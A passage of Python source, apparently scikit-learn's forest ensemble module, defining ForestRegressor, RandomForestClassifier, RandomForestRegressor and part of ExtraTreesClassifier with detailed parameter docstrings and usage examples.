all_proba = [np.zeros((X.shape[0], j), dtype=np.float64)
for j in np.atleast_1d(self.n_classes_)]
lock = threading.Lock()
Parallel(n_jobs=n_jobs, verbose=self.verbose,
**_joblib_parallel_args(require="sharedmem"))(
delayed(_accumulate_prediction)(e.predict_proba, X, all_proba,
lock)
for e in self.estimators_)
for proba in all_proba:
proba /= len(self.estimators_)
if len(all_proba) == 1:
return all_proba[0]
else:
return all_proba
def predict_log_proba(self, X):
"""
Predict class log-probabilities for X.
The predicted class log-probabilities of an input sample is computed as
the log of the mean predicted class probabilities of the trees in the
forest.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
p : ndarray of shape (n_samples, n_classes), or a list of such arrays
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute :term:`classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class ForestRegressor(RegressorMixin, BaseForest, metaclass=ABCMeta):
"""
Base class for forest of trees-based regressors.
Warning: This class should not be used directly. Use derived classes
instead.
"""
@abstractmethod
def __init__(self,
base_estimator,
n_estimators=100, *,
estimator_params=tuple(),
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
max_samples=None):
super().__init__(
base_estimator,
n_estimators=n_estimators,
estimator_params=estimator_params,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
max_samples=max_samples)
def predict(self, X):
"""
Predict regression target for X.
The predicted regression target of an input sample is computed as the
mean predicted regression targets of the trees in the forest.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
y : ndarray of shape (n_samples,) or (n_samples, n_outputs)
The predicted values.
"""
check_is_fitted(self)
# Check data
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
# avoid storing the output of every estimator by summing them here
if self.n_outputs_ > 1:
y_hat = np.zeros((X.shape[0], self.n_outputs_), dtype=np.float64)
else:
y_hat = np.zeros((X.shape[0]), dtype=np.float64)
# Parallel loop
lock = threading.Lock()
Parallel(n_jobs=n_jobs, verbose=self.verbose,
**_joblib_parallel_args(require="sharedmem"))(
delayed(_accumulate_prediction)(e.predict, X, [y_hat], lock)
for e in self.estimators_)
y_hat /= len(self.estimators_)
return y_hat
@staticmethod
def _get_oob_predictions(tree, X):
"""Compute the OOB predictions for an individual tree.
Parameters
----------
tree : DecisionTreeRegressor object
A single decision tree regressor.
X : ndarray of shape (n_samples, n_features)
The OOB samples.
Returns
-------
y_pred : ndarray of shape (n_samples, 1, n_outputs)
The OOB associated predictions.
"""
y_pred = tree.predict(X, check_input=False)
if y_pred.ndim == 1:
# single output regression
y_pred = y_pred[:, np.newaxis, np.newaxis]
else:
# multioutput regression
y_pred = y_pred[:, np.newaxis, :]
return y_pred
def _set_oob_score_and_attributes(self, X, y):
"""Compute and set the OOB score and attributes.
Parameters
----------
X : array-like of shape (n_samples, n_features)
The data matrix.
y : ndarray of shape (n_samples, n_outputs)
The target matrix.
"""
self.oob_prediction_ = super()._compute_oob_predictions(X, y).squeeze(
axis=1
)
if self.oob_prediction_.shape[-1] == 1:
# drop the n_outputs axis if there is a single output
self.oob_prediction_ = self.oob_prediction_.squeeze(axis=-1)
self.oob_score_ = r2_score(y, self.oob_prediction_)
def _compute_partial_dependence_recursion(self, grid, target_features):
"""Fast partial dependence computation.
Parameters
----------
grid : ndarray of shape (n_samples, n_target_features)
The grid points on which the partial dependence should be
evaluated.
target_features : ndarray of shape (n_target_features)
The set of target features for which the partial dependence
should be evaluated.
Returns
-------
averaged_predictions : ndarray of shape (n_samples,)
The value of the partial dependence function on each grid point.
"""
grid = np.asarray(grid, dtype=DTYPE, order='C')
averaged_predictions = np.zeros(shape=grid.shape[0],
dtype=np.float64, order='C')
for tree in self.estimators_:
# Note: we don't sum in parallel because the GIL isn't released in
# the fast method.
tree.tree_.compute_partial_dependence(
grid, target_features, averaged_predictions)
# Average over the forest
averaged_predictions /= len(self.estimators_)
return averaged_predictions
class RandomForestClassifier(ForestClassifier):
"""
A random forest classifier.
A random forest is a meta estimator that fits a number of decision tree
classifiers on various sub-samples of the dataset and uses averaging to
improve the predictive accuracy and control over-fitting.
The sub-sample size is controlled with the `max_samples` parameter if
`bootstrap=True` (default), otherwise the whole dataset is used to build
each tree.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : int, default=100
The number of trees in the forest.
.. versionchanged:: 0.22
The default value of ``n_estimators`` changed from 10 to 100
in 0.22.
criterion : {"gini", "entropy"}, default="gini"
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
Note: this parameter is tree-specific.
max_depth : int, default=None
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int or float, default=2
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for fractions.
min_samples_leaf : int or float, default=1
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for fractions.
min_weight_fraction_leaf : float, default=0.0
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`round(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)` (same as "auto").
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int, default=None
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, default=0.0
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
.. versionadded:: 0.19
min_impurity_split : float, default=None
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. deprecated:: 0.19
``min_impurity_split`` has been deprecated in favor of
``min_impurity_decrease`` in 0.19. The default value of
``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
will be removed in 1.0 (renaming of 0.25).
Use ``min_impurity_decrease`` instead.
bootstrap : bool, default=True
Whether bootstrap samples are used when building trees. If False, the
whole dataset is used to build each tree.
oob_score : bool, default=False
Whether to use out-of-bag samples to estimate the generalization score.
Only available if bootstrap=True.
n_jobs : int, default=None
The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
:meth:`decision_path` and :meth:`apply` are all parallelized over the
trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
context. ``-1`` means using all processors. See :term:`Glossary
<n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls both the randomness of the bootstrapping of the samples used
when building trees (if ``bootstrap=True``) and the sampling of the
features to consider when looking for the best split at each node
(if ``max_features < n_features``).
See :term:`Glossary <random_state>` for details.
verbose : int, default=0
Controls the verbosity when fitting and predicting.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
class_weight : {"balanced", "balanced_subsample"}, dict or list of dicts, \
default=None
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
Note that for multioutput (including multilabel) weights should be
defined for each class of every column in its own dict. For example,
for four-class multilabel classification weights should be
[{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
[{1:1}, {2:5}, {3:1}, {4:1}].
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that
weights are computed based on the bootstrap sample for every tree
grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
ccp_alpha : non-negative float, default=0.0
Complexity parameter used for Minimal Cost-Complexity Pruning. The
subtree with the largest cost complexity that is smaller than
``ccp_alpha`` will be chosen. By default, no pruning is performed. See
:ref:`minimal_cost_complexity_pruning` for details.
.. versionadded:: 0.22
max_samples : int or float, default=None
If bootstrap is True, the number of samples to draw from X
to train each base estimator.
- If None (default), then draw `X.shape[0]` samples.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples. Thus,
`max_samples` should be in the interval `(0.0, 1.0]`.
.. versionadded:: 0.22
Attributes
----------
base_estimator_ : DecisionTreeClassifier
The child estimator template used to create the collection of fitted
sub-estimators.
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : ndarray of shape (n_classes,) or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
n_features_ : int
The number of features when ``fit`` is performed.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
n_outputs_ : int
The number of outputs when ``fit`` is performed.
feature_importances_ : ndarray of shape (n_features,)
The impurity-based feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance.
Warning: impurity-based feature importances can be misleading for
high cardinality features (many unique values). See
:func:`sklearn.inspection.permutation_importance` as an alternative.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
This attribute exists only when ``oob_score`` is True.
oob_decision_function_ : ndarray of shape (n_samples, n_classes) or \
(n_samples, n_classes, n_outputs)
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
`oob_decision_function_` might contain NaN. This attribute exists
only when ``oob_score`` is True.
See Also
--------
DecisionTreeClassifier, ExtraTreesClassifier
Notes
-----
The default values for the parameters controlling the size of the trees
(e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
unpruned trees which can potentially be very large on some data sets. To
reduce memory consumption, the complexity and size of the trees should be
controlled by setting those parameter values.
The features are always randomly permuted at each split. Therefore,
the best found split may vary, even with the same training data,
``max_features=n_features`` and ``bootstrap=False``, if the improvement
of the criterion is identical for several splits enumerated during the
search of the best split. To obtain a deterministic behaviour during
fitting, ``random_state`` has to be fixed.
References
----------
.. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
Examples
--------
>>> from sklearn.ensemble import RandomForestClassifier
>>> from sklearn.datasets import make_classification
>>> X, y = make_classification(n_samples=1000, n_features=4,
... n_informative=2, n_redundant=0,
... random_state=0, shuffle=False)
>>> clf = RandomForestClassifier(max_depth=2, random_state=0)
>>> clf.fit(X, y)
RandomForestClassifier(...)
>>> print(clf.predict([[0, 0, 0, 0]]))
[1]
"""
def __init__(self,
n_estimators=100, *,
criterion="gini",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=True,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
ccp_alpha=0.0,
max_samples=None):
super().__init__(
base_estimator=DecisionTreeClassifier(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"min_impurity_decrease", "min_impurity_split",
"random_state", "ccp_alpha"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight,
max_samples=max_samples)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_decrease = min_impurity_decrease
self.min_impurity_split = min_impurity_split
self.ccp_alpha = ccp_alpha
class RandomForestRegressor(ForestRegressor):
"""
A random forest regressor.
A random forest is a meta estimator that fits a number of classifying
decision trees on various sub-samples of the dataset and uses averaging
to improve the predictive accuracy and control over-fitting.
The sub-sample size is controlled with the `max_samples` parameter if
`bootstrap=True` (default), otherwise the whole dataset is used to build
each tree.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : int, default=100
The number of trees in the forest.
.. versionchanged:: 0.22
The default value of ``n_estimators`` changed from 10 to 100
in 0.22.
criterion : {"squared_error", "mse", "absolute_error", "poisson"}, \
default="squared_error"
The function to measure the quality of a split. Supported criteria
are "squared_error" for the mean squared error, which is equal to
variance reduction as feature selection criterion, "absolute_error"
for the mean absolute error, and "poisson" which uses reduction in
Poisson deviance to find splits.
Training using "absolute_error" is significantly slower
than when using "squared_error".
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
.. versionadded:: 1.0
Poisson criterion.
.. deprecated:: 1.0
Criterion "mse" was deprecated in v1.0 and will be removed in
version 1.2. Use `criterion="squared_error"` which is equivalent.
.. deprecated:: 1.0
Criterion "mae" was deprecated in v1.0 and will be removed in
version 1.2. Use `criterion="absolute_error"` which is equivalent.
max_depth : int, default=None
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int or float, default=2
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for fractions.
min_samples_leaf : int or float, default=1
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for fractions.
min_weight_fraction_leaf : float, default=0.0
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`round(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int, default=None
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, default=0.0
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
.. versionadded:: 0.19
min_impurity_split : float, default=None
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. deprecated:: 0.19
``min_impurity_split`` has been deprecated in favor of
``min_impurity_decrease`` in 0.19. The default value of
``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
will be removed in 1.0 (renaming of 0.25).
Use ``min_impurity_decrease`` instead.
bootstrap : bool, default=True
Whether bootstrap samples are used when building trees. If False, the
whole dataset is used to build each tree.
oob_score : bool, default=False
Whether to use out-of-bag samples to estimate the generalization score.
Only available if bootstrap=True.
n_jobs : int, default=None
The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
:meth:`decision_path` and :meth:`apply` are all parallelized over the
trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
context. ``-1`` means using all processors. See :term:`Glossary
<n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls both the randomness of the bootstrapping of the samples used
when building trees (if ``bootstrap=True``) and the sampling of the
features to consider when looking for the best split at each node
(if ``max_features < n_features``).
See :term:`Glossary <random_state>` for details.
verbose : int, default=0
Controls the verbosity when fitting and predicting.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
ccp_alpha : non-negative float, default=0.0
Complexity parameter used for Minimal Cost-Complexity Pruning. The
subtree with the largest cost complexity that is smaller than
``ccp_alpha`` will be chosen. By default, no pruning is performed. See
:ref:`minimal_cost_complexity_pruning` for details.
.. versionadded:: 0.22
max_samples : int or float, default=None
If bootstrap is True, the number of samples to draw from X
to train each base estimator.
- If None (default), then draw `X.shape[0]` samples.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples. Thus,
`max_samples` should be in the interval `(0.0, 1.0]`.
.. versionadded:: 0.22
Attributes
----------
base_estimator_ : DecisionTreeRegressor
The child estimator template used to create the collection of fitted
sub-estimators.
estimators_ : list of DecisionTreeRegressor
The collection of fitted sub-estimators.
feature_importances_ : ndarray of shape (n_features,)
The impurity-based feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance.
Warning: impurity-based feature importances can be misleading for
high cardinality features (many unique values). See
:func:`sklearn.inspection.permutation_importance` as an alternative.
n_features_ : int
The number of features when ``fit`` is performed.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
This attribute exists only when ``oob_score`` is True.
oob_prediction_ : ndarray of shape (n_samples,) or (n_samples, n_outputs)
Prediction computed with out-of-bag estimate on the training set.
This attribute exists only when ``oob_score`` is True.
See Also
--------
DecisionTreeRegressor, ExtraTreesRegressor
Notes
-----
The default values for the parameters controlling the size of the trees
(e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
unpruned trees which can potentially be very large on some data sets. To
reduce memory consumption, the complexity and size of the trees should be
controlled by setting those parameter values.
The features are always randomly permuted at each split. Therefore,
the best found split may vary, even with the same training data,
``max_features=n_features`` and ``bootstrap=False``, if the improvement
of the criterion is identical for several splits enumerated during the
search of the best split. To obtain a deterministic behaviour during
fitting, ``random_state`` has to be fixed.
The default value ``max_features="auto"`` uses ``n_features``
rather than ``n_features / 3``. The latter was originally suggested in
[1], whereas the former was more recently justified empirically in [2].
References
----------
.. [1] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
.. [2] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized
trees", Machine Learning, 63(1), 3-42, 2006.
Examples
--------
>>> from sklearn.ensemble import RandomForestRegressor
>>> from sklearn.datasets import make_regression
>>> X, y = make_regression(n_features=4, n_informative=2,
... random_state=0, shuffle=False)
>>> regr = RandomForestRegressor(max_depth=2, random_state=0)
>>> regr.fit(X, y)
RandomForestRegressor(...)
>>> print(regr.predict([[0, 0, 0, 0]]))
[-8.32987858]
"""
def __init__(self,
n_estimators=100, *,
criterion="squared_error",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=True,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
ccp_alpha=0.0,
max_samples=None):
super().__init__(
base_estimator=DecisionTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"min_impurity_decrease", "min_impurity_split",
"random_state", "ccp_alpha"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
max_samples=max_samples)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_decrease = min_impurity_decrease
self.min_impurity_split = min_impurity_split
self.ccp_alpha = ccp_alpha
class ExtraTreesClassifier(ForestClassifier):
"""
An extra-trees classifier.
This class implements a meta estimator that fits a number of
randomized decision trees (a.k.a. extra-trees) on various sub-samples
of the dataset and uses averaging to improve the predictive accuracy
and control over-fitting.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : int, default=100
The number of trees in the forest.
.. versionchanged:: 0.22
The default value of ``n_estimators`` changed from 10 to 100
in 0.22.
criterion : {"gini", "entropy"}, default="gini"
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
max_depth : int, default=None
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int or float, default=2
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for fractions.
min_samples_leaf : int or float, default=1
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for fractions.
min_weight_fraction_leaf : float, default=0.0
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`round(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int, default=None
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, default=0.0
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
.. versionadded:: 0.19
min_impurity_split : float, default=None
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. deprecated:: 0.19
``min_impurity_split`` has been deprecated in favor of
``min_impurity_decrease`` in 0.19. The default value of
``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
will be removed in 1.0 (renaming of 0.25).
Use ``min_impurity_decrease`` instead.
bootstrap : bool, default=False
Whether bootstrap samples are used when building trees. If False, the
whole dataset is used to build each tree.
oob_score : bool, default=False
Whether to use out-of-bag samples to estimate the generalization score.
Only available if bootstrap=True.
n_jobs : int, default=None
The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
:meth:`decision_path` and :meth:`apply` are all parallelized over the
trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
context. ``-1`` means using all processors. See :term:`Glossary
<n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls 3 sources of randomness:
- the bootstrapping of the samples used when building trees
(if ``bootstrap=True``)
- the sampling of the features to consider when looking for the best
split at each node (if ``max_features < n_features``)
- the draw of the splits for each of the `max_features`
See :term:`Glossary <random_state>` for details.
verbose : int, default=0
Controls the verbosity when fitting and predicting.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
class_weight : {"balanced", "balanced_subsample"}, dict or list of dicts, \
default=None
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
Note that for multioutput (including multilabel) weights should be
defined for each class of every column in its own dict. For example,
for four-class multilabel classification weights should be
[{0: 1, 1: 1}, {0: 1, 1: 5}, {0: 1, 1: 1}, {0: 1, 1: 1}] instead of
[{1:1}, {2:5}, {3:1}, {4:1}].
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``
The "balanced_subsample" mode is the same as "balanced" except that
weights are computed based on the bootstrap sample for every tree
grown.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
ccp_alpha : non-negative float, default=0.0
Complexity parameter used for Minimal Cost-Complexity Pruning. The
subtree with the largest cost complexity that is smaller than
``ccp_alpha`` will be chosen. By default, no pruning is performed. See
:ref:`minimal_cost_complexity_pruning` for details.
.. versionadded:: 0.22
max_samples : int or float, default=None
If bootstrap is True, the number of samples to draw from X
to train each base estimator.
- If None (default), then draw `X.shape[0]` samples.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples. Thus,
`max_samples` should be in the interval `(0.0, 1.0]`.
.. versionadded:: 0.22
Attributes
----------
base_estimator_ : ExtraTreesClassifier
The child estimator template used to create the collection of fitted
sub-estimators.
estimators_ : list of DecisionTreeClassifier
The collection of fitted sub-estimators.
classes_ : ndarray of shape (n_classes,) or a list of such arrays
The classes labels (single output problem), or a list of arrays of
class labels (multi-output problem).
n_classes_ : int or list
The number of classes (single output problem), or a list containing the
number of classes for each output (multi-output problem).
feature_importances_ : ndarray of shape (n_features,)
The impurity-based feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance.
Warning: impurity-based feature importances can be misleading for
high cardinality features (many unique values). See
:func:`sklearn.inspection.permutation_importance` as an alternative.
n_features_ : int
The number of features when ``fit`` is performed.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
n_outputs_ : int
The number of outputs when ``fit`` is performed.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
This attribute exists only when ``oob_score`` is True.
oob_decision_function_ : ndarray of shape (n_samples, n_classes) or \
(n_samples, n_classes, n_outputs)
Decision function computed with out-of-bag estimate on the training
set. If n_estimators is small it might be possible that a data point
was never left out during the bootstrap. In this case,
`oob_decision_function_` might contain NaN. This attribute exists
only when ``oob_score`` is True.
See Also
--------
sklearn.tree.ExtraTreeClassifier : Base classifier for this ensemble.
RandomForestClassifier : Ensemble Classifier based on trees with optimal
splits.
Notes
-----
The default values for the parameters controlling the size of the trees
(e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
unpruned trees which can potentially be very large on some data sets. To
reduce memory consumption, the complexity and size of the trees should be
controlled by setting those parameter values.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized
trees", Machine Learning, 63(1), 3-42, 2006.
Examples
--------
>>> from sklearn.ensemble import ExtraTreesClassifier
>>> from sklearn.datasets import make_classification
>>> X, y = make_classification(n_features=4, random_state=0)
>>> clf = ExtraTreesClassifier(n_estimators=100, random_state=0)
>>> clf.fit(X, y)
ExtraTreesClassifier(random_state=0)
